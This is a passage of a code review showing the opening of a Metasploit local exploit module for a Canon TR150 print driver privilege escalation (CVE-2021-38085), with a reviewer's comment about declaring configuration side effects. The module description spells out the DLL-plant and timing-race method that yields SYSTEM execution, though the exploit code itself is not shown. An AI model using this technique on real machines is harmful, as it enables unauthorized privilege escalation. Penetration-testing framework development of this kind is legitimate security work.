modules/exploits/windows/local/canon_driver_privesc.rb

```diff
@@ -0,0 +1,150 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = NormalRanking
+
+  include Msf::Post::File
+  include Msf::Exploit::EXE
+  include Msf::Post::Windows::Priv
+  include Msf::Exploit::FileDropper
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Canon Driver Privilege Escalation',
+        'Description' => %q{
+          Canon TR150 print drivers versions 3.71.2.10 and below allow local users to read/write files
+          within the "CanonBJ" directory and its subdirectories. By writing a malicious DLL to the
+          C:\ProgramData\CanonBJ\IJPrinter\CNMWINDOWS\Canon TR150 series\LanguageModules\040C\CNMurGE.dll
+          path at the right time whilst running the C:\Windows\System32\Printing_Admin_Scripts\en-US\prnmngr.vbs
+          script to install a new printer, a timing issue can be exploited to cause the PrintIsolationHost.exe program,
+          which runs as NT AUTHORITY\SYSTEM, to successfully load the malicious DLL. Successful exploitation
+          will grant attackers code execution as the NT AUTHORITY\SYSTEM user.
+
+          This module leverages the prnmngr.vbs script
+          to add and delete printers. Multiple runs of this
+          module may be required given successful exploitation
+          is time-sensitive.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Jacob Baines', # discovery, PoC, module
+          'Shelby Pace' # original Ricoh module
+        ],
+        'References' =>
+          [
+            ['CVE', '2021-38085'],
+          ],
+        'Arch' => [ ARCH_X86, ARCH_X64 ],
+        'Platform' => 'win',
+        'SessionTypes' => [ 'meterpreter' ],
+        'Targets' =>
+          [
+            [
+              'Windows', { 'Arch' => [ ARCH_X86, ARCH_X64 ] }
+            ]
+          ],
+        'Notes' =>
+        {
+          'SideEffects' => [ ARTIFACTS_ON_DISK ],
```

Comment:
Might be good to add CONFIG_CHANGES given that we overwrite one of the DLLs and don't restore it.